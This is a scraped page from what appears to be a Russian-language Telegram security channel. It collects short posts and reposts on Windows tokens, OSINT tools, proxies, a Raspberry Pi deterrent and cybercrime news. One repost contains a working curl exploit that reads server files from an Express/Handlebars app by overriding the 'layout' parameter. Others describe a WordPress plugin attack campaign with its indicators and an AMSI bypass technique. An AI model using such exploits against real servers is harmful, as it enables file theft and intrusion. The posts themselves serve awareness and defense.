cookie

Ми використовуємо файли cookie для покращення вашого досвіду перегляду. Натиснувши «Прийняти все», ви погоджуєтеся на використання файлів cookie.

avatar

S.E.Reborn

Copyright: @SEAdm1n Вакансии: @infosec_work Информационная безопасность. Литература для ИТ специалистов. Пентест, Хакинг, OSINT, СИ, DevOps, Администрирование. Сотрудничество - @SEAdm1n

Більше
Рекламні дописи
22 260
Підписники
+1824 години
+137 днів
+3830 днів

Триває завантаження даних...

Приріст підписників

Триває завантаження даних...

😟 Токены. От появления до продвижения в Active Directory. • О токенах, используемых в операционных системах семейства Windows слышали многие, ведь они являются важным звеном, участвующим в контексте безопасности всей операционной системы. • В данной статье последовательно изложены теоретическая и практическая части, позволяющие понять важность токенов в операционных системах семейства Windows. ➡️ https://habr.com/ru/articles/776298/ #AD #ИБ
Показати все...
1
An awesome list of all (1.958) available Google Earth Engine Apps and user-specific App Galleries. No Earth Engine account is required to view or interact with a published App. ➡️ https://github.com/philippgaertner/awesome-earth-engine-apps #OSINT
Показати все...
GitHub - philippgaertner/awesome-earth-engine-apps: A collection of all public Google Earth Engine Apps.

A collection of all public Google Earth Engine Apps. - GitHub - philippgaertner/awesome-earth-engine-apps: A collection of all public Google Earth Engine Apps.

3
Repost from Cybred
The Secret Parameter, LFR, and Potential RCE in NodeJS Apps Ставишь ExpressJs с шаблонизатором Handlebars:
npx express-generator
express --view hbs
Бонусом получаешь LFR и, потенциально, RCE. Пример непримечательного кода
var express = require('express');
var router = express.Router();

router.post('/', function(req, res, next) {
  var profile = req.body.profile
   res.render('index', profile)
});

module.exports = router;
А теперь эксплойт для LFR, чтобы прочитать исходники
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://localhost:9090/'
Внутри миддлвары, в процессе рендера, на самом деле существует параметр layout, который получается переопределить, благодаря нашему переданному словарю. С точки зрения кода, вместо
res.render('index', profile)
Правильно использовать
res.render('index', { profile })
Но даже так остается риск эксплуатации с помощью классического Prototype Pollution.
Показати все...
1
Repost from SecAtor
WPScan предупреждают, что хакеры приступили к массовым атакам на сайты WordPress с устаревшей версией плагина LiteSpeed Cache, создавая подконтрольные админские учетки на уязвимых ресурсах. LiteSpeed Cache (LS Cache) - это плагин кеширования, установленный почти на 5 миллионах сайтоих WordPress, который обеспечивает ускорение загрузки страниц и более высокие показатели в поисковой выдаче Google. Усилившаяся в апреле вредоносная активность нацелена на ХSS-уязвимость с CVSS: 8,8, отслеживаемую как CVE-2023-40000. Она затрагивает все версии плагина старше 5.7.0.1 и позволяет неаутентифицированному пользователю повысить привилегии с помощью специально созданных HTTP-запросов. Исследователи WPScan обнаружили более 1,2 миллионов попыток сканирования уязвимых сайтов лишь с одного IP-адреса 94[.]102[.]51[.]144. WPScan сообщает, что в атаках используется вредоносный код JavaScript, внедренный в критические файлы WordPress или базу данных, в результате чего создаются пользователи-администраторы с именами «wpsupp‑user» или «wp‑configuser». Еще одним признаком заражения является наличие строки eval(atob(Strings.fromCharCode в опции litespeed.admin_display.messages в базе данных. Несмотря на то, что большая часть пользователей LiteSpeed Cache перешла на более поздние версии плагина, до 1 835 000 продолжают использовать уязвимую версию.
Показати все...
Surge of JavaScript Malware in sites with vulnerable versions of LiteSpeed Cache Plugin

If you’ve recently encountered the admin user wpsupp-user on your website, it means it’s being affected by this wave of infections. Identifying Contamination Signs: The malware typicall…

2
📶 Forward Proxy vs Reverse Proxy. • Наглядно о разнице между Forward Proxy и Reverse Proxy. В обоих случаях Proxy — это сервер-посредник. Разница в том, какую роль он играет в цепочке client <-> proxy <-> server. Forward Proxy работает в связке с клиентом (выступает от его имени), а Reverse proxy — с сервером (выступает за сервер). #Разное
Показати все...
🔥 6 3
Современным проблемам — современные решения В 2024 г. специалист по кибербезопасности — это самая востребованная IT- профессия. Услуги таких профессионалов нужны любому крупному бизнесу — они защищают инфраструктуру компании, выявляют угрозы и отражают атаки. Вместе с НИУ ВШЭ в Нетологии разработали программу магистратуры «Кибербезопасность». На дне открытых дверей расскажем о задачах специалиста, направлениях в кибербезе, перспективах профессии и принципах работы онлайн- магистратуры. Встреча будет полезна всем, кто хочет сменить направление работы или сделать следующий шаг в карьере. Ждём и опытных специалистов кибербезопасности — вы узнаете, как получить диплом и подтвердить свои компетенции. Когда: 14 мая, 18:00 мск Регистрация Реклама. ООО "Нетология". Erid 2VSb5xFyxUg
Показати все...
Repost from vx-underground
Some of LockbitSupp a/k/a Dmitry Khoroshev's data and PII was exposed as a result of a Yandex data breach. It exposes his address and food order history. It shows him ordering Cheesecake Factory semi-frequently. Information via Info_IntelX
Показати все...
😁 10😭 1
Repost from vx-underground
Today the United States Department of Justice unveiled the leader of Lockbit ransomware group.
Показати все...
😱 5🤷‍♂ 3😢 3
🦮 Необычные проекты на Raspberry Pi: пёс-охранник. • Виртуальная собака Woof — это простенький скрипт на Python, который запускает аудиозапись собачьего лая через динамики, чтобы отпугнуть барсуков, енотов или людей, если те приблизились к дому. • Пара колонок подключена Raspberry Pi. Одна из колонок направлена на входную дверь, а другая — на заднюю, откуда тоже может исходить угроза. Громкость лая динамически изменяется между динамиками, словно собака бегает по дому от одной двери ко второй и заливается лаем. • Технически виртуальная собака работает следующим образом: - Камеры наблюдения транслируют RTSP-поток в программу Blue Iris NVR, которая крутится на отдельной коробочке под Windows. - Когда Blue Iris обнаруживает объект в определённой области, то отправляет MQTT-сообщение в канал iot/cameras брокера Mosquitto, запущенного на медиасервере. - На Raspberry Pi работает скрипт, который прослушивает iot/cameras с помощью модуля asyncio-mqtt. Он получает JSON-сообщение вида {"serial": "SE-N-ZoneB"} и декодирует его. Если название камеры соответствует указанному в скрипте, то запускается на воспроизведение соответствующий аудиофайл с помощью Pygame. • Ложные срабатывания (на свет автомобильных фар или мелких животных) не слишком опасны. Скорее наоборот, они делают виртуальную собаку более реалистичной, потому что у настоящих собак происходят такие же «ложные срабатывания». • В будущем автор планирует добавить в систему физический триггер на ступеньках перед домом, чтобы пёс начинал лаять конкретно на человека, который подошёл к двери. Рассматривается возможность установки внутри дома радарного датчика HFS-DC06, который срабатывает через внешнюю стену. • Известно, что лай собак и камеры видеонаблюдения — главные отпугивающие факторы для взломщиков. Даже виртуальная собака из колонок — это лучше, чем отсутствие собаки. К автору этого изобретения уже заходил потенциальный грабитель, который подёргал ручку двери гаража. Дверь была закрыта, поэтому он залез в гараж соседа. В любом случае, дополнительная безопасность никогда не помешает. #Разное
Показати все...
🔥 5
Repost from SecAtor
Исследователь Victor Khoury (ака Vixx) из Offsec продемонстрировал новую расширенную уязвимость обхода AMSI Write Raid, которая реализуется без использования API VirtualProtect и изменения защиты памяти, для которой был также представлен PoC. Интерфейс AMSI от Microsoft, доступный в Windows 10 и более поздних версиях, был разработан для обнаружения и предотвращения вредоносных программ, позволяя проверять различные приложения, службы и сценарии во время выполнения. Vixx удалось найти доступную запись внутри System.Management.Automation.dll, которая содержит адрес AmsiScanBuffer, критического компонента AMSI, который оказался доступен не только для чтения, как в случае с таблицей адресов импорта IAT. Манипулируя адресом AmsiScanBuffer с использованием этой записи внутри System.Management.Automation.dll, исследователь смог обойти AMSI без изменения настроек защиты памяти. Подробно весь процесс обнаружения и эксплуатации описан в блоге Offsec, а представленный экспериментальный сценарий успешно отработал как в PowerShell 5, так и в PowerShell 7, позволив обойти Microsoft Defender и большинство других AV-продуктов, использующих AMSI.
Показати все...
AMSI Write Raid Bypass Vulnerability | OffSec

In this blog post, we'll introduce a new bypass technique designed to bypass AMSI without the VirtualProtect API and without changing memory protection.

1